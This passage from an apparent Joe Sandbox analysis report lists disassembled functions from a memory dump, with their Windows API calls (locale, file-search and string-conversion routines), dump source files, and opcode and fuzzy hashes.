                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0093393E
                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0093397D
                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 009339B0
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2701053895-0
                                                                                                                                                                                            • Opcode ID: a0dc558812f2d4b6673a5c1a24e36867fcb0a5e56a703ce1882f6799b8f3600a
                                                                                                                                                                                            • Instruction ID: 44a6e611467353300f7cb7ce3a6fa97ccd13fbb0a7e6b7b82736f1cef066c724
                                                                                                                                                                                            • Opcode Fuzzy Hash: a0dc558812f2d4b6673a5c1a24e36867fcb0a5e56a703ce1882f6799b8f3600a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C5157B5940118AFDF149F789CDAEBEB7BDDF85318F1481A9F40A97201EA309E419F60
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0092E783: GetLastError.KERNEL32(00000000,?,00930AB9), ref: 0092E787
                                                                                                                                                                                              • Part of subcall function 0092E783: SetLastError.KERNEL32(00000000,?,?,00000028,0092B9D2), ref: 0092E829
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00933005
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3736152602-0
                                                                                                                                                                                            • Opcode ID: b650f374b2365af55facd5aec22ee3056b789b4d8f69c0ad49542325fb63a620
                                                                                                                                                                                            • Instruction ID: 2e70e65c9816640eb6155208fdc5343f2e85002642587b002464d8b72348fc30
                                                                                                                                                                                            • Opcode Fuzzy Hash: b650f374b2365af55facd5aec22ee3056b789b4d8f69c0ad49542325fb63a620
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2321B072655216ABEB289B29EC82BBB73ACEF45310F10817AF901D6145EB349E409A90
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0092E783: GetLastError.KERNEL32(00000000,?,00930AB9), ref: 0092E787
                                                                                                                                                                                              • Part of subcall function 0092E783: SetLastError.KERNEL32(00000000,?,?,00000028,0092B9D2), ref: 0092E829
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00933125
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3736152602-0
                                                                                                                                                                                            • Opcode ID: 0b066bb36c90d6ba8546fbb74342923287fb19791757fdcf33d0dc9c0fe5606e
                                                                                                                                                                                            • Instruction ID: 79757d7e88a8103530fb13dac675fae6b5a9202a12060ff92ec2a7c115347eea
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b066bb36c90d6ba8546fbb74342923287fb19791757fdcf33d0dc9c0fe5606e
                                                                                                                                                                                            • Instruction Fuzzy Hash: D6112536655216ABDB14EB68EC42EBA73ECEF45310F10817AF501D7240EB38EE009B90
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0092E783: GetLastError.KERNEL32(00000000,?,00930AB9), ref: 0092E787
                                                                                                                                                                                              • Part of subcall function 0092E783: SetLastError.KERNEL32(00000000,?,?,00000028,0092B9D2), ref: 0092E829
                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00932CFF,00000001,00000000,?,-00000050,?,00932AEF,00000000,-00000002,00000000,?,00000055,?), ref: 00932CD6
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                            • Opcode ID: d8d1e7e3e89286364fd674fe694e1ae4f5d95377563bf658f3cfd6247c1d9506
                                                                                                                                                                                            • Instruction ID: d4d7c1de21878d251527e82f2d8c0e2ba6baa795d6cad392cafddb3c5245f02f
                                                                                                                                                                                            • Opcode Fuzzy Hash: d8d1e7e3e89286364fd674fe694e1ae4f5d95377563bf658f3cfd6247c1d9506
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4711E53B2047059FDB18AF39C8A16BABB96FF80758F14842CE98687B40D771A943DB40
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0092E783: GetLastError.KERNEL32(00000000,?,00930AB9), ref: 0092E787
                                                                                                                                                                                              • Part of subcall function 0092E783: SetLastError.KERNEL32(00000000,?,?,00000028,0092B9D2), ref: 0092E829
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00932F1B,00000000,00000000,?), ref: 009332AA
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3736152602-0
                                                                                                                                                                                            • Opcode ID: 09df87c0e08616f5a8fdef144109b46a7522d5455a2cb977fc21fb7f2eead090
                                                                                                                                                                                            • Instruction ID: cedb163b0aa936ac09ecc3f83c81585efe3184c79d5cece86a237e3281d2d23e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 09df87c0e08616f5a8fdef144109b46a7522d5455a2cb977fc21fb7f2eead090
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A014936640112BFDB185B24CC06BBB3758DB40754F158529EC22A3180EA75FF41CED4
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0092E783: GetLastError.KERNEL32(00000000,?,00930AB9), ref: 0092E787
                                                                                                                                                                                              • Part of subcall function 0092E783: SetLastError.KERNEL32(00000000,?,?,00000028,0092B9D2), ref: 0092E829
                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00932FB1,00000001,?,?,-00000050,?,00932AB7,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00932F9C
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                            • Opcode ID: d0894ac4c3dd572f7a13d93049cea8f74503d4d7a3462df2baa53a852b5f1304
                                                                                                                                                                                            • Instruction ID: 8d3c8faf6906429030ad65db915048eb4bdc6a2f3a0525522a77eb34e0f89209
                                                                                                                                                                                            • Opcode Fuzzy Hash: d0894ac4c3dd572f7a13d93049cea8f74503d4d7a3462df2baa53a852b5f1304
                                                                                                                                                                                            • Instruction Fuzzy Hash: A5F0F6362043086FDB146F399881B7A7BA5EFC0768F05842CF9454B680C7B19C42DA50
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0092B750: EnterCriticalSection.KERNEL32(-00023A67,?,00928F5A,00000000,009444D8,0000000C,00928F13,?,?,0092F83A,?,?,0092E921,00000001,00000364,009231E1), ref: 0092B75F
                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(0092F70A,00000001,00944928,0000000C,0092F118,-00000050), ref: 0092F74F
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1272433827-0
                                                                                                                                                                                            • Opcode ID: 3c37f2f15d6c768b13197a858662aef402e2faa3308249d7f26346aaad9648bc
                                                                                                                                                                                            • Instruction ID: 7f6e1f3c931a87260b9e6fc065fb6f9cba545c32f3604b4254021e084163b8b0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c37f2f15d6c768b13197a858662aef402e2faa3308249d7f26346aaad9648bc
                                                                                                                                                                                            • Instruction Fuzzy Hash: 93F037B6A18214DFD700DFA8E842F9D77B0FB89725F00816AE400DB2A1DB7949049F80
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0092E783: GetLastError.KERNEL32(00000000,?,00930AB9), ref: 0092E787
                                                                                                                                                                                              • Part of subcall function 0092E783: SetLastError.KERNEL32(00000000,?,?,00000028,0092B9D2), ref: 0092E829
                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(009330D1,00000001,?,?,?,00932B11,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 009330BD
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                            • Opcode ID: 03ca13e97ee964274197f1143fc15ec95fd1b2621404ad09c93e6ea92a12a5ab
                                                                                                                                                                                            • Instruction ID: 1da0c844c1a4fa52b1c73752c2b3a2a7d87b73a35623ed4173938eb21f3f4bfd
                                                                                                                                                                                            • Opcode Fuzzy Hash: 03ca13e97ee964274197f1143fc15ec95fd1b2621404ad09c93e6ea92a12a5ab
                                                                                                                                                                                            • Instruction Fuzzy Hash: 54F0233A74020957CB0CDF35D8457667F95EFC1714F068058EE058B651C671D942DB90
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,0092A4BC,?,20001004,00000000,00000002,?,?,009293CE), ref: 0092F250
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                                                                            • Opcode ID: 95184ce390e72c09c79bfcd36b587261f3741203e2128814ff8f949140609a67
                                                                                                                                                                                            • Instruction ID: 37136c0a5c2b082e63bb7a26487adf0ad83c40e43805dc17f890d707d62e06db
                                                                                                                                                                                            • Opcode Fuzzy Hash: 95184ce390e72c09c79bfcd36b587261f3741203e2128814ff8f949140609a67
                                                                                                                                                                                            • Instruction Fuzzy Hash: 12E04F3A504138FBCF126F60EC15FAE3F29EF857A0F004430FD1565265CB718920AA95
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00005135), ref: 00925019
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                            • Opcode ID: 5a5359c00a47f8a676e13e85a651e0c327416fc7be86661066633649ae575a10
                                                                                                                                                                                            • Instruction ID: 2967b81c919af36ed8e5cf24b62096b2454927997e9acf00740650f8add5ddbd
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a5359c00a47f8a676e13e85a651e0c327416fc7be86661066633649ae575a10
                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: HeapProcess
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 54951025-0
                                                                                                                                                                                            • Opcode ID: 6d31c28ab71572eb32e295c7adc276b106d9da60cd7b4060a361296118d6cb7d
                                                                                                                                                                                            • Instruction ID: 4556360a4e2cd904444be402fb0f560ab81afb61576a3f208e79245178307d89
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d31c28ab71572eb32e295c7adc276b106d9da60cd7b4060a361296118d6cb7d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2CA012B4519100CB53008F31A904E083A9855071813048054A040C0020E73080407F01
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetCPInfo.KERNEL32(0077FEE0,0077FEE0,00000000,7FFFFFFF,?,0093A20D,0077FEE0,0077FEE0,00000000,0077FEE0,?,?,?,?,0077FEE0,00000000), ref: 0093A2C8
                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0093A383
                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0093A412
                                                                                                                                                                                            • __freea.LIBCMT ref: 0093A45D
                                                                                                                                                                                            • __freea.LIBCMT ref: 0093A463
                                                                                                                                                                                            • __freea.LIBCMT ref: 0093A499
                                                                                                                                                                                            • __freea.LIBCMT ref: 0093A49F
                                                                                                                                                                                            • __freea.LIBCMT ref: 0093A4AF
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 127012223-0
                                                                                                                                                                                            • Opcode ID: 0d192362818210641fd04e7ca688b56cc652455592a2eb983d37366621c366a4
                                                                                                                                                                                            • Instruction ID: 7152f7c7b501a3836365ab49f903e73a401d7c1952f4c58c1c68d0220515a704
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d192362818210641fd04e7ca688b56cc652455592a2eb983d37366621c366a4
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3371F732900215AFDF219E949C89FAF7BBE9F85310F254459F985A72A1E679CC008F62
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 0092550C
                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00925538
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00925577
                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00925594
                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 009255D3
                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 009255F0
                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00925632
                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00925655
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                            • String ID:
